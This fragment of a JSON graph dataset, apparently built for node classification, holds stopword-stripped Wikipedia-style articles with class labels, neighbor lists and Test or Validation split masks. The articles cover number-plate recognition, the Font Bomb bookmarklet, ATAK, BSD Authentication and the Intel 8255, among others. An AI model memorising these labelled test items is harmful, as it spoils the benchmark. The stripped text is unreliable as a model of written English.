recorded varying level ambient light headlight glare harsh environmental conditions dedicated license plate capture cameras incorporate infrared illumination order solve problems lighting plate reflectivity many countries use license plates retroreflective returns light back source thus improves contrast image countries characters plate reflective giving high level contrast reflective background lighting conditions camera makes use active infrared imaging normal colour filter lens infrared illuminator next benefits greatly infrared waves reflected back plate possible dedicated anpr cameras however cameras used purposes must rely heavily software capabilities full-colour image required well use anpr-retrieved details necessary one infrared-enabled camera one normal colour camera working together avoid blurring ideal shutter speed dedicated camera set 1/1000 second also important camera uses global shutter opposed rolling shutter assure taken images distortion-free car moving slower shutter speeds could result image blurred read using ocr software especially camera much higher vehicle slow-moving traffic camera lower level vehicle angle approaching camera shutter speed need fast shutter speeds 1/500 second cope traffic moving 40 mph 64 km/h 1/250 second 5 mph 8 km/h license plate capture cameras produce usable images vehicles traveling maximize chances effective license plate capture installers carefully consider positioning camera relative target capture area exceeding threshold angles incidence camera lens license plate greatly reduce probability obtaining usable images due distortion manufacturers developed tools help eliminate errors physical installation license plate capture cameras several state police forces department justice victoria use fixed mobile anpr systems new south wales police force highway patrol first trial use fixed anpr camera system australia 2005 2009 began roll-out mobile anpr system known officially manpr three infrared cameras fitted highway patrol fleet system identifies unregistered stolen vehicles well disqualified suspended drivers well 'persons interest persons outstanding warrants city mechelen uses anpr system since september 2011 scan cars crossing city limits inbound outbound cars listed 'black lists insurance stolen etc generate alarm dispatching room intercepted patrol early 2012 1 million cars per week automatically checked way police service ontario uses automatic licence-plate recognition software nab drivers behind wheels vehicles ontario number plates technique tested danish police permanent use since mid 2016 180 gantries major roads built throughout country together 250 fixed cameras enable levy eco tax lorries 3.5 tonnes system currently opposed whilst may collecting data vehicles passing cameras eco tax charged 11 march 2008 federal constitutional court germany ruled areas laws permitting use automated number plate recognition systems germany violated right privacy specifically court found retention sort information i.e. number plate data pre-destined use e.g. use tracking suspected terrorists enforcement speeding laws violation german law systems provided jenoptik robot gmbh called trafficapture 2012 state consortium formed among hungarian ministry interior national police headquarters central commission public administration electronic services aim install operate unified intelligent transportation system nationwide coverage end 2015 within system 160 portable traffic enforcement data-gathering units 365 permanent gantry installations brought online anpr speed detection imaging statistical capabilities since data points connected centrally located member consortium able separately utilize range administrative enforcement activities remote vehicle registration insurance verification speed lane traffic light enforcement wanted stolen vehicle interception among others several hungarian auxiliary police units also use system called matrix police cooperation police consists portable computer equipped web camera scans stolen car database using automatic number-plate recognition system installed dashboard selected patrol vehicles pda-based hand-held versions also exist mainly used control license plate parking cars auxiliary police authority order moving vehicles stop stolen car found formal police informed vehicle registration plates saudi arabia use white background several vehicle types may different background united states diplomatic plates letters 'usd arabic reads 'dsu read right left direction arabic script 17 arabic letters used registration plates challenge plates recognition saudi arabia size digits plates use eastern arabic numerals 'western arabic equivalents research source code available apnr arabic digits technique tested swedish police authority nine different locations sweden several cities tested—and put service—the kgys kent guvenlik yonetim sistemi city security administration system i.e. capital ankara debuted kgys- consists registration plate number recognition system main arteries city exits system used two cameras per lane one plate recognition one speed detection system widened network registration number cameras together enforcing average speed preset distances arteries limit photo evidence date-time details posted registration address speed violation detected 2012 fine exceeding speed limit 30 approximately us 175 project system integration « olli technology » ministry internal affairs ukraine department state traffic inspection sti experiments introduction modern technical complex capable locate stolen cars drivers deprived driving licenses problem cars real time ukrainian complex video control working principle video fixing car recognition license plates check data base home office states purpose automatic number-plate recognition united kingdom help detect deter disrupt criminality including tackling organised crime groups terrorists vehicle movements recorded network nearly 8000 cameras capturing 25 30 million anpr ‘ read ’ records daily records stored two years national anpr data center accessed analysed used evidence part investigations uk law enforcement agencies 2012 uk parliament enacted protection freedoms act includes several provisions related controlling restricting collection storage retention use information individuals act home office published code practice 2013 use surveillance cameras including anpr government law enforcement agencies aim code help ensure use characterised surveillance consent consent part community must informed consent assumed system operator surveillance consent regarded analogous policing consent addition set standards introduced 2014 data infrastructure data access management united states anpr systems commonly referred alpr automatic license plate reader/recognition technology due differences language i.e. number plates referred license plates american english mobile anpr use widespread among us law enforcement agencies city county state federal level according 2012 report police executive research forum approximately 71 us police departments use form anpr mobile anpr becoming significant component municipal predictive policing strategies intelligence gathering well recovery stolen vehicles identification wanted felons revenue collection individuals delinquent city state taxes fines monitoring amber alerts widespread implementation technology many u.s. states issue misdemeanor citations 500 license plate identified expired incorrect vehicle successfully recognized plates may matched databases including wanted person protection order missing person gang member known suspected terrorist supervised release immigration violator national sex offender lists addition real-time processing license plate numbers anpr systems us collect indefinitely store data license plate capture images dates times gps coordinates stockpiled help place suspect scene aid witness identification pattern recognition tracking individuals department homeland security proposed federal database combine monitoring systems cancelled privacy complaints 1998 washington d.c. police lieutenant pleaded guilty extortion blackmailing owners vehicles parked near gay bar 2015 los angeles police department proposed sending letters home addresses vehicles enter areas high prostitution early private sector mobile anpr applications vehicle repossession recovery although application anpr private companies collect information privately owned vehicles collected private property example driveways become issue sensitivity public debate anpr uses include parking enforcement revenue collection individuals delinquent city state taxes fines technology often featured reality tv show parking wars featured e network show tow truck drivers booting teams use anpr find delinquent vehicles high amounts unpaid parking fines laws vary among states regarding collection retention license plate information 14 states limits long data may retained lowest new hampshire 3 minutes colorado 3 years supreme court virginia ruled 2018 data collected alprs constitute personal information anpr used speed limit enforcement australia austria belgium dubai uae france italy netherlands spain south africa uk kuwait works tracking vehicles travel time two fixed points calculating average speed cameras claimed advantage traditional speed cameras maintaining steady legal speeds extended distances rather encouraging heavy braking approach specific camera locations subsequent acceleration back illegal speeds developed monitoring system named covering 2500 km 2012 tutor system also able intercept cars changing lanes average speed cameras trajectcontrole place netherlands since 2002 july 2009 12 cameras operational mostly west country along a12 divided several “ sections ” allow cars leaving entering motorway first experimental system tested short stretch a2 1997 deemed big success police reducing overspeeding 0.66 compared 5 6 regular speed cameras used location first permanent average speed cameras installed a13 2002 shortly speed limit reduced 80 km/h limit noise air pollution area 2007 average speed cameras resulted 1.7 million fines overspeeding total 9.7 millions according dutch attorney general average number violation speed limits motorway sections equipped average speed cameras 1 2 compared 10 15 elsewhere one notable stretches average speed cameras uk found a77 road scotland monitored kilmarnock girvan 2006 confirmed speeding tickets could potentially avoided 'specs cameras changing lanes rac foundation feared people may play russian roulette changing one lane another lessen odds caught however 2007 system upgraded multi-lane use 2008 manufacturer described myth “ categorically untrue ” exists evidence implementation systems specs considerable effect volume drivers travelling excessive speeds stretch road mentioned a77 glasgow ayr noted huge drop speeding violations since introduction specs system recent innovations contributed adoption anpr perimeter security access control applications government facilities within us homeland security efforts protect alleged acts terrorism resulted adoption anpr sensitive facilities embassies schools airports maritime ports military federal buildings law enforcement government facilities transportation centers anpr marketed able implemented networks ip based surveillance cameras perform double duty alongside facial recognition object tracking recording systems purpose monitoring suspicious anomalous behavior improving access control matching watch lists anpr systems commonly installed points significant sensitivity ingress egress major us agencies department homeland security department justice department transportation department defense purchased anpr perimeter security applications large networks anpr systems installed cities boston london new york city provide citywide protection acts terrorism provide support public gatherings public spaces center evidence-based crime policy george mason university identifies following randomized controlled trials automatic number-plate recognition technology rigorous addition government facilities many private sector industries facility security concerns beginning implement anpr solutions examples include casinos hospitals museums parking facilities resorts us private facilities typically access government police watch lists may develop match databases customers vips critical personnel banned person lists addition providing perimeter security private anpr service applications valet recognized customer vip recognition logistics key personnel tracking sales advertising parking management logistics vendor support vehicle tracking many cities districts developed traffic control systems help monitor movement flow vehicles around road network typically involved looking historical data estimates observations statistics cctv cameras used help traffic control centres giving live data allowing traffic management decisions made real-time using anpr footage possible monitor travel individual vehicles automatically providing information speed flow various routes details highlight problem areas occur help centre make informed incident management decisions counties united kingdom worked siemens traffic develop traffic monitoring systems control centres public projects hampshire county council romanse provide interactive real-time website showing details traffic city site shows information car parks ongoing road works special events footage taken cctv cameras anpr systems used provide average point-to-point journey times along particular routes displayed variable-message sign vms giving drivers ability plan route romanse also allows travellers see current situation using mobile device internet connection wap gprs 3g allowing view mobile device cctv images within hampshire road network uk company trafficmaster used anpr since 1998 estimate average traffic speeds non-motorway roads without results skewed local fluctuations caused traffic lights similar company operates network 4000 anpr cameras claims four central digits identified numberplate data retained ieee intelligent transportation systems society published papers plate number recognition technologies applications ontario 407 etr highway uses combination anpr radio transponders toll vehicles entering exiting road radio antennas located junction detect transponders logging unique identity vehicle much way anpr system without anpr second system would possible monitor traffic drivers opt rent transponder c 2.55 per month charged video toll charge c 3.60 using road heavy vehicles gross weight 5,000 kg required use one using either system users highway notified usage charges post numerous electronic toll collection networks use combination radio frequency identification anpr include portuguese roads old highways toll stations drivers pay cards also lanes electronic collection systems however new highways option electronic toll collection system electronic toll collection system comprises three different structures smart tag installed vehicle car quickly identified owner bank account automatically deducted process realized speed 250 km per hour car smart tag driver required go pay station pay tolls 3rd 5th day surplus charge fails owner sent letter home heavy fine paid increases five-fold car inserted police database vehicle impounding system also used limited access areas main cities allow entry pre-registered residents planned implemented roads city entrance toll collection/access restriction efficacy system considered high almost impossible driver complain london congestion charge example system charges motorists entering payment area transport london tfl uses anpr systems charges motorists daily fee £11.50 enter leave move around within congestion charge zone 7 a.m. 6:00 p.m. monday friday reduced fee £10.50 paid vehicle owners sign automatic deduction scheme fines traveling within zone without paying charge £65 per infraction paid deadline doubling £130 per infraction thereafter currently 1,500 cameras use automatic number plate recognition anpr technology also number mobile camera units may deployed anywhere zone estimated around 98 vehicles moving within zone caught camera video streams transmitted data centre located central london anpr software deduces registration plate vehicle second data centre provides backup location image data front back number plates captured vehicles going – gives four chances capture number plates vehicle entering exiting zone list compared list cars whose owners/operators paid enter zone – paid fined registered owner vehicle looked database provided dvla johannesburg south africa anpr used etoll fee collection owners cars driving inner city must pay charge.the number tolls passed depends distance travelled particular freeway freeways anpr n12 n3 n1 etc stockholm sweden anpr used stockholm congestion tax owners cars driving inner city must pay charge depending time day 2013 also gothenburg congestion tax also includes vehicles passing city main highways several uk companies agencies use anpr systems include vehicle operator services agency vosa driver vehicle licensing agency dvla transport london anpr systems may also used for/by vehicle owners used variety techniques attempt evade anpr systems road-rule enforcement cameras general one method increases reflective properties lettering makes likely system unable locate plate produce high enough level contrast able read typically done using plate cover spray though claims regarding effectiveness latter disputed jurisdictions covers illegal covered existing laws countries law disallow use sprays users attempted smear license plate dirt utilize covers mask plate novelty frames around texas license plates made illegal texas 1 september 2003 texas senate bill 439 caused problems anpr devices law made class c misdemeanor punishable fine us 200 class b punishable fine us 2,000 180 days jail proven owner deliberately obscure plates law later clarified 2007 allow novelty frames anpr system read plate flag image attention human operators looking see able identify alphanumerics order avoid surveillance penalty charges upsurge car cloning usually achieved copying registration plates another car similar model age difficult detect especially cloners may change registration plates travel behavior hinder investigations 2013 researchers sunflex zone ltd created privacy license plate frame uses near infrared light make license plate unreadable license plate recognition systems introduction anpr systems led fears misidentification furthering 1984 -style surveillance united states gregg easterbrook oppose call machines issue speeding tickets red-light tickets beginning slippery slope towards automated justice system similar criticisms raised countries easterbrook also argues technology employed maximize revenue state rather promote safety electronic surveillance system produces tickets us often excess 100 virtually impossible citizen contest court without help attorney revenues generated machines shared generously private corporation builds operates creating strong incentive tweak system generate many tickets possible older systems notably unreliable uk known lead charges made incorrectly vehicle owner pay £10 order issued proof offense improvements technology drastically decreased error rates false accusations still frequent enough problem perhaps best known incident involving abuse anpr database north america case edmonton sun reporter kerry diotte 2004 diotte wrote article critical edmonton police use traffic cameras revenue enhancement retaliation added anpr database high-risk drivers attempt monitor habits create opportunity arrest police chief several officers fired result office privacy commissioner canada expressed public concern growing police use technology spy motorists concerns include storage information could used identify people store details driving habits daily life contravening data protection act along similar legislation see personally identifiable information laws uk strict system uses cctv footage identify individuals also concern safety data mined following discovery police surveillance records lost gutter also case uk saying use anpr cameras unlawful regulation investigatory powers act 2000 breach exists say fact anpr used monitor activities law-abiding citizens treats everyone like suspected criminals intended surveyed act police known refer system anpr 24/7 traffic movement database diversion intended purpose identifying vehicles involved criminal activities opposing viewpoint plates cloned 'read innocent motorist vehicle allow elimination vehicle investigation visual examination images stored likewise stolen vehicles read anpr systems time theft report police assisting investigation associated press reported august 2011 new york police department cars license plate tracking equipment purchased federal hidta high intensity drug trafficking area funds used spy muslims mosques track license plate numbers worshipers police unmarked cars outfitted electronic license plate readers would drive street automatically catalog plates everyone parked near mosque amassing covert database would distributed among officers used profile muslims public 2013 american civil liberties union aclu released 26,000 pages data anpr systems obtained local state federal agencies freedom information laws documents paint startling picture technology deployed rules becoming tool mass routine location tracking surveillance wrote aclu aclu reported many locations devices used store location information vehicles suspected particular offense private companies also using license plate readers sharing information collect police little oversight privacy protections lack regulation means policies governing long location data kept vary widely aclu said 2012 aclu filed suit department homeland security funds many local state anpr programs grants agency failed provide access records aclu requested freedom information act programs mid-august 2015 boston discovered license plate records million people online unprotected many anpr systems claim accuracy trained match plates single jurisdiction region fail trying recognize plates jurisdictions due variations format font color layout plate features jurisdictions offer vanity affinity plates particularly us create many variations within single jurisdiction time time us states make significant changes license plate protocol affect ocr accuracy may add character add new license plate design alpr systems must adapt changes quickly order effective another challenge alpr systems states license plate protocol example one state uses standard three letters followed four numbers time alpr systems alarms user ’ responsibility make sure plate caused alarm matches state associated license plate listed in-car computer maximum effectiveness anpr system able recognize plates jurisdiction jurisdiction associated many variables make tasks difficult currently least one us anpr provider platesmart claims system independently reviewed able accurately recognize us state jurisdiction license plates one european anpr provider claims system differentiate eu plate jurisdictions anpr software vendors publish accuracy results based image benchmarks results may vary depending images vendor chosen include test 2017 sighthound reported 93.6 accuracy private image benchmark 2017 openalpr reported accuracy rates commercial software range 95-98 public image benchmark april 2018 research brazil ’ federal university paraná federal university minas gerais compared systems reported median recognition rate 93.53 stated significant improvement 81.8 rate obtained previous works",
    "neighbors": [
      5857,
      5133,
      1169,
      5331,
      5875,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 6886,
    "label": 9,
    "text": "Font_Bomb:font bomb font bomb javascript bookmarklet blow web pages script loaded clicking web page starts countdown countdown reaches zero uses cascading style sheets scatter nearby text across page script wraps affected letters tag moved individually",
    "neighbors": [
      8923,
      5622,
      3462,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6887,
    "label": 2,
    "text": "Android_Tactical_Assault_Kit:android tactical assault kit android tactical assault kit atak android smartphone geospatial infrastructure military situational awareness app built using nasa worldwind initially created 2010 air force research laboratory based nasa worldwind mobile codebase development deployment grew slowly rapidly since 2016 2013 officials draper laboratory said system would compatible android mobile operating systems could used navigation spatial awareness controlling drones atak plugin architecture allows developers add functionality atak polaris integrated ground guidance software atak plugin allow off-road routing mounted dismounted soldiers accounting terrain weather enemy activity equipment load connections programs atak began august 2010 originally based nasa worldwind mobile goal demonstrate robust information sharing mobile format oct 14 2014 u.s. army geospatial center recommended afrl android tactical assault kit atak world-leader esri commercial joint mapping tool kit cjmtk nasa world wind army globe engine age map engine driving nett warrior end user device atak selected due similar capabilities cjmtk similar risk less one-third total cost read full public released report nett warrior map engine trade study september 2015 darpa reported atak used successful demonstration persistent close air support program use thousands users according january 2016 article national defense magazine atak already fielded afsoc units atak excellent suitability coordinating people geography atak made available federal government users contractors need coordination atak also made available government researchers wish experiment geospatial collaboration without building systems versions addition android version also windows version wintak iphone version development itak wintak application developed microsoft windows operating system uses maps allow precise targeting intelligence surrounding land formations navigation generalized situational awareness developed conjunction atak provide similar functionality windows platform commercial licensing january 2015 afrl began licensing atak techlink u. s. companies commercial use support state/local government uses well civilian uses november 2015 twenty-five companies licensed atak commercial uses techlink licensing site",
    "neighbors": [
      2259,
      6887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6888,
    "label": 2,
    "text": "BSD_Authentication:bsd authentication bsd authentication otherwise known bsd auth authentication framework software api employed openbsd accompanying software openssh originated bsd/os although specification implementation donated freebsd project bsdi openbsd chose adopt framework release 2.9 pluggable authentication modules pam serves similar purpose operating systems linux freebsd netbsd bsd auth performs authentication executing scripts programs separate processes one requiring authentication prevents child authentication process interfering parent except narrowly defined inter-process communication api technique inspired principle least privilege known privilege separation behaviour significant security benefits notably improved fail-safeness software robustness malicious accidental software bugs pam uses alternative system modules providing authentication dynamically linked requesting process method considered flexible bsd auth provide privilege separation without additional configuration",
    "neighbors": [
      5506,
      7,
      10631,
      4242,
      3477,
      8344,
      2080,
      2083,
      9635,
      2087,
      4663,
      823,
      5433,
      5568,
      4423,
      10058,
      6098,
      10835,
      6750,
      2143,
      8670,
      2274,
      4071,
      11246,
      1012,
      2804,
      5492,
      1785
    ],
    "mask": "None"
  },
  {
    "node_id": 6889,
    "label": 3,
    "text": "Intel_8255:intel 8255 intel 8255 i8255 programmable peripheral interface ppi chip developed manufactured intel first half 1970s intel 8080 microprocessor 8255 provides 24 parallel input/output lines variety programmable operating modes 8255 member mcs-85 family chips designed intel use 8085 8086 microprocessors descendants first available 40-pin dip later 44-pin plcc packages found wide applicability digital processing systems later cloned manufacturers 82c55 cmos version higher speed lower current consumption functionality 8255 mostly embedded larger vlsi processing chips sub-function cmos version 8255 still made renesas mostly used expand i/o microcontrollers 8255 similar function mos technology 6522 versatile interface adapter 6526 mos technology cia complex interface adapter developed 6502 family chips originally available 40-pin dil package 8255 provides 24 usable i/o pins whereas mos chips provide 16 i/o pins plus 4 control pins however mos chips contain functions two programmable reload timers simple i/o shift register function furthermore mos devices allow direction input output i/o pins individually programmed 8255 i/o pins four programmable direction bits one port 7:0 one port b 7:0 one port c 3:0 one port c 7:4 comparable microprocessor i/o chips 2655 programmable peripheral interface signetics 2650 family motorola 6820 pia peripheral interface adapter motorola 6800 family western design center wdc 65c21 8255 widely used many microcomputer/microcontroller systems home computers sv-328 msx models 8255 used original ibm-pc pc/xt pc/jr clones along numerous homebuilt computers n8vem 8255 gives cpu digital system access programmable parallel i/o 8255 24 input/output pins divided three 8-bit ports b c port port b used 8-bit input/output ports port c used 8-bit input/output port two 4-bit input/output ports produce handshake signals ports b three ports grouped follows eight data lines d0–d7 available 8-bit data buffer read/write data ports control register status formula_1rd pin 5 formula_1wr pin 36 active-low signals read write operations respectively address lines allow access data register port control register listed control signal chip select formula_1cs pin 6 used enable 8255 chip active-low signal i.e. formula_1cs 0 8255 enabled reset input pin 35 connected reset line system like 8085 8086 etc. system reset ports initialized input lines done prevent 8255 and/or peripheral connected destroyed due mismatch ports example consider input device connected 8255 port previous operation port initialized output port 8255 reset using current configuration possibility damage either input device connected 8255 since 8255 device connected sending data control register control logic command word register 8-bit register used select modes operation input/output designation ports two basic operational modes 8255 two modes selected basis value present bit control word register 1 8255 operates i/o mode 0 operates bsr mode bit set/reset bsr mode available port c line port c pc pc set reset writing suitable value control word register bsr mode i/o mode independent selection bsr mode affect operation ports i/o mode selection port c pin determined follows example needed pc set control word thus per values 0b hex loaded control word register cwr mode selected bit control word register 1 three i/o modes example port b upper port c initialized input ports lower port c port output ports mode 0 hence desired operation control word register loaded 10001010 8a hex mode ports used simple i/o operations without handshaking signals port port b provide simple i/o operation two halves port c either used together additional 8-bit port used individual 4-bit ports since two halves port c independent may used one-half initialized input port half initialized output port input/output features mode 0 follows 'latched means bits put storage register array flip-flops holds output constant even inputs change latched 8255 outputs latched hold last data written required data stays bus one cycle without latching outputs would become invalid soon write cycle finishes inputs latched cpu read current values store data cpu register memory needs referenced later time input changes port read result may indeterminate wish use port port b handshake strobed input output operation initialise port mode 1 port port b initilalised operate different modes i.e. e.g. port operate mode 0 port b mode 1 pins port c function handshake lines port b mode irrespective whether acting input port output port pc0 pc1 pc2 pins function handshake lines port initialised mode 1 input port pc3 pc4 pc5 function handshake signals pins pc6 pc7 available use input/output lines mode 1 supports handshaking following features input handshaking signals output handshaking signals port initialized mode port used bidirectional handshake data transfer means data input output eight lines pa0 pa7 pins pc3 pc7 used handshake lines port remaining pins port c pc0 pc2 used input/output lines group b initialized mode 0 handshaking port b group b initialized mode 1 mode 8255 may used extend system bus slave microprocessor transfer data bytes floppy disk controller acknowledgement handshaking signals provided maintain proper data flow synchronisation data transmitter receiver",
    "neighbors": [
      548,
      5128,
      9006,
      6129,
      7281,
      2874,
      9947
    ],
    "mask": "None"
  },
  {
    "node_id": 6890,
    "label": 2,
    "text": "LXLE_Linux:lxle linux lxle linux distribution based upon recent ubuntu/lubuntu lts release using lxde desktop environment lxle lightweight distro focus visual aesthetics works well old new hardware january 2014 review full circle magazine gabriele tettamanzi noted lxle minor localization issues otherwise described nice light fast desktop rich software stable jesse smith reviewed lxle 12.04.3 distrowatch weekly jesse smith also reviewed lxde 14.04",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      546,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      1101,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      10851,
      3685,
      9320,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      8909,
      3791,
      6352,
      7385,
      11481,
      10971,
      4841,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      2864,
      823,
      3387,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      3969,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      8147,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 6891,
    "label": 7,
    "text": "Clio_(software_company):clio software company clio legal technology company headquartered burnaby british columbia clio offers law firms cloud-based software handles various law practice management tasks including client intake contact management calendaring document management timekeeping billing trust accounting clio established 2007 jack newton rian gauvreau felt software commonly use law firms time expensive difficult use company launched software 2008 first cloud-based practice management software developed law firms 2012 clio series b raised 6 million time investment second-largest ever made british columbia-based internet company company also made first version application programming interface available 2012 september 2013 clio released mobile application provides access company software ios devices release occurred company first annual cloud conference event gained prominence legal technology industry 2014 clio received 20 million series c funding also announced android version mobile application major product update october 2016 clio published first legal trends report annual publication references aggregated metrics company user base analyze trends benchmarks law firm operations october 5 2018 clio announced acquired client intake software provider lexicata lexicata product would converted new product called clio grow time clio also supported 120 integrations legal software applications",
    "neighbors": [
      4194
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6892,
    "label": 1,
    "text": "GuideStar:guidestar guidestar usa inc. information service specializing reporting u.s. nonprofit companies 2016 database provided information 2.5 million organizations guidestar one first central sources information u.s. nonprofits world largest source information nonprofit organizations guidestar founded williamsburg virginia september 1994 received tax-exempt status 1996 year company began posting nonprofit organizations financial reports world wide web guidestar also serves verify recipient organization established donated funds go donor intended individuals looking give wake disasters 2013 guidestar announced major changes guidestar exchange program allows nonprofits supplement public information available irs guidestar nonprofit profiles implemented three seals based information nonprofit provides profile bronze silver gold 2016 new seal allowed nonprofits share progress results mission guidestar platinum introduced 2019 guidestar merged foundation center form new organization candid charity watch investigator compared charity navigator charity watch better business bureau combined federal campaign great nonprofits investigator praised guidestar offering information rather making judgments guidestar placed notice pages charities listed southern poverty law center splc hate list one groups sued guidestar defamation charities echoed criticism guidestar use splc list",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6893,
    "label": 3,
    "text": "LOADHIGH:loadhigh computing abbreviated internal dos command command.com used load program upper memory area uma instead conventional memory command introduced ms-dos 5.0 pc dos 5.0 1991 copying built-in command earlier introduced dr dos 5.0 1990 dr dos 6.0 added support naming variant well 1991 due design ibm pc dos suffered known 640 kib barrier size memory area known conventional memory fixed independent amount system memory actually installed various schemes developed support extra memory see also ems xms dos extenders conventional memory still issue due compatibility issues scarce resource many applications demanded large part basic memory fragment runtime therefore often necessary move high tsr programs like mouse driver disk caching driver like smartdrv prior running memory-hungry application achieved using called program name parameter load tsrs high within config.sys installhigh directive must used instead command equivalent device drivers devicehigh usable within config.sys also supported since dr dos 6.0 dr dos 5.0 higher also support hiinstall hidevice respectively modern operating systems run protected mode support unsegmented flat memory model 640 kb constraint methods freeing conventional memory largely become obsolete",
    "neighbors": [
      6148,
      7847,
      6797,
      7983,
      178,
      1237,
      9525,
      3323,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 6894,
    "label": 5,
    "text": "Internet_Cache_Protocol:internet cache protocol internet cache protocol icp udp-based protocol used coordinating web caches purpose find appropriate location retrieve requested object situation multiple caches use single site icp use caches efficiently possible minimize number remote requests originating server hierarchically queried cache either parent sibling parents usually sit closer internet connection child child cache find object query usually sent parent cache fetch cache pass request siblings caches equal hierarchical status whose purpose distribute load amongst siblings request comes one cache cluster siblings icp used query siblings object requested sibling object usually transferred instead queried original server often called near miss — object found cache “ miss ” loaded nearby cache instead remote server icp protocol designed lightweight order minimize round-trip time caches intended unreliable quick connections approach reduce numbers server retrievals also prevent storage multiple copies instance data leads potential drawback increased intercache communication slow system icp protocol described rfc 2186 application hierarchical web caching rfc 2187 web proxies support icp include htcp designed successor icp attempts handle various problems found icp deployments icp message consists two sections header header length fixed 20 octets five 32-bit words data data variable length limited maximum icp message size including header 16,384 octets icp header consists 8 fields 2 optional fields fifth sixth field optional pink background table appropriately named “ options ” “ option data ”",
    "neighbors": [
      3520,
      8648,
      6569,
      7567,
      9616,
      11413,
      6140
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6895,
    "label": 3,
    "text": "MacCharlie:maccharlie maccharlie hardware add-on apple macintosh made dayna communications name refers ibm pc advertising campaign time featuring charlie chaplin little tramp character allowed users run dos software ibm pc clipping unit onto chassis 128k macintosh well keyboard extender provide function keys numeric keypad absent apple original keyboard clip-on unit sat side mac like contemporary amiga sidecar contained essentially complete ibm pc compatible 8088 processor 256k ram expandable 640k single 5.25 floppy drive stored 360k second floppy drive could added running dos software users could still access macintosh menu bar desk accessories maccharlie used mac terminal performing dos processing sending video data relatively slow serial link mac display slowness coupled declining prices real ibm pc compatibles contributed short market life maccharlie",
    "neighbors": [
      6129,
      3323,
      8540
    ],
    "mask": "Test"
  },
  {
    "node_id": 6896,
    "label": 3,
    "text": "Outbound_laptop:outbound laptop outbound laptop apple macintosh-compatible laptop computer powered 15-mhz motorola 68000 processor later versions increased clock speed 20 mhz outbound systems inc. located boulder colorado due kangaroo logo many believed australian company outbound laptop introduced 1989 significantly lighter 4 kg easier carry apple macintosh portable released around time due apple refusal license macintosh toolbox read-only memory rom outbound users install mac rom make computer work rom typically removed older mac process would render donor mac unusable even additional cost typical price us 4,000 compared favorably mac portable outbound featured built-in pointing device located keyboard named trackbar earlier models referring trademark isopoint cylinder scrolled slid left right ran standard camcorder batteries rather expensive custom batteries commonly found portable computers around time outbound laptop succeeded outbound notebook 1991 notebook ran style lead-acid camcorder batteries earlier laptop 9.7 passive-matrix monochrome lcd display used 2.5 ide hard drive unusual time apple n't start using ide drives powerbooks powerbook 150 1994 notebook internal microphone speaker headphone jack two serial ports adb port scsi port notebook scsi port unique supported outbound outrigger full-page external monochrome monitor attached via scsi port notebook cpu ram mac rom optional 68882 fpu mounted removable daughtercard permitted easy ram installation optional upgrades daughtercard could simply swapped another one faster cpu fpu inserted available socket daughtercard four 30-pin simm sockets due notebook design 4mb ram could addressed mac system software even system 7 additional ram would appear silicon disk outbound specific ram disk apple introduction powerbook 1991 led demise mac-compatible laptop aftermarket probably significant increased competition fact outbound using roms licensing agreement apple apple refused license use subsequent proprietary roms outbound company ability manufacture laptops ended 68000 processors required roms access became difficult obtain short time outbound went business small group former employees set company perfit handle service warranty issues perfit ceased operations 1994",
    "neighbors": [
      1776,
      11649,
      7269,
      6183
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6897,
    "label": 7,
    "text": "Axway_Software:axway software axway software publicly held information technology company provides software tools enterprise software enterprise application integration business activity monitoring business analytics mobile application development web api management listed compartment b companies market capitalizations €150 million €1 billion paris euronext since june 2011 axway software incorporated 28 december 2000 software infrastructure division french services company sopra spun-out subsidiary sopra subsequently merged another french services company steria form sopra steria 2014 sopra used axway vehicle expansion enterprise application integration market subsequently number acquisitions made axway swedish company viewlocity acquired early 2002 christophe fabre became ceo axway 2005 remained position 2015 axway acquired us company cyclone commerce january 2006 much executive management axway relocated phoenix arizona february 2007 axway acquired atos b2b software business germany us company tumbleweed communications acquired june 2008 june 2011 axway spun sopra group listed paris euronext november 2012 irish company vordel api management vendor acquired brazilian company sci soluções acquired september 2013 january 2014 axway acquired assets information gateway australia axway acquired french company systar developer business activity monitoring software june 2014 january 2016 axway acquired us company appcelerator creator appcelerator titanium open-source framework multiplatform native mobile app development axway acquired us company syncplicity developer file share synchronization service february 2017 2017 sopra steria holds 33.52 axway sopra gmt holding company sopra steria axway holds 21.65 may 2016 sopra steria acquired 8.62 stake axway formerly held société générale axway component cac small 2016 axway 11,000 customers 100 countries since going public 2011 annual revenues grown €217.2 million 2011 €301.1 million 2016 profits grown €35.3 million 2011 €50.8 million 2016 axway headquartered phoenix arizona puteaux paris company development centers france annecy also site axway registered office lyon paris romania bucharest bulgaria sofia united states scottsdale arizona santa clara california also various support centers including one noida india acquisition sci 2013 lead establishment axway south america regional headquarters são paulo brazil 2017 axway main product amplify platform amplify acts data integration platform number formerly independent legacy products including appcelerator titanium provides uniform user interface various components amplify allows creation api-based services supports embedded real-time predictive analytics provides dashboards summarize data information provided different components sources axway also provides marketplace third party products services related apis titanium-built mobile apps",
    "neighbors": [
      7891,
      8751
    ],
    "mask": "Test"
  },
  {
    "node_id": 6898,
